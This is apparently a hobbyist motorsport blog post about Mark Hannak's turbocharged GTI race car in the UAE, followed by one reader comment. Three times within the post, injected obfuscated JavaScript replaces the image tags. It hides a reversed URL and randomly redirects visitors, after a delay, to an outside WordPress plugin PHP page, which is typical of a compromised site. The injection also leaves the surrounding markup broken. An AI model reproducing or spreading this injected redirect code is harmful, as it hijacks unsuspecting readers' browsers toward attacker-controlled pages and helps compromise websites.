The ‘Hannak monster’. GTI. UAETCC

I’m sat here at a rather large dining table in a beautiful house in a truly stunning part of the world and for some obscure reason racing jumped into my mind. We are but a month away now and there is frantic action happening all around the UAE to get machines ready. One in particular that I am really looking forward to seeing again is fellow GTI battler, rival and good buddy Mark Hannak.
You see, Mark took a slightly different route to crankandpiston with his car however we have found so much common ground through the build process. From suspension set-up and alignment to the continual and wallet bashing desire to go FAST.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/random%20race/dubairacing44.jpg” width=”728″ />
I promised a story on this mean machine that thanks to a full turbo set-up as turned into a complete monster capable of leaving Porsche GT3’s floundering. The APR Stage3 kit that is currently fitted pumps a mind warping 380bhp out – so no wonder he walks away from most of the competition.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/random%20race/dubairacing75.jpg” width=”728″ />
However rather than giving a retrospective we will be catching up with Mark soon to document the latest changes the car has gone through over the summer.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/random%20race/dubairacing60.jpg” width=”728″ />
I for one can’t wait to get out there and see this car fly again this year..hopefully we will have pulled some of the bhp deficit back through or differing direction in terms of set-up and extra width and rubber from our side.

  1. Oh yes I nearly forgot about Mr. Hannak’s uber clean, and suspiciously fast, GTI Cup car.

    Hope to see him back on teh grid for this season – whatever he did to the car last year he was hanging in rather well near the end!
